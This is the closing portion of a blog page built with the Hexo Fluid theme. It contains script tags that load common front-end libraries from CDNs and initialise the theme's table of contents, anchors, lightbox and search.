    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script  src="https://lib.baomitu.com/prism/1.28.0/plugins/line-numbers/prism-line-numbers.min.js" ></script>

  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
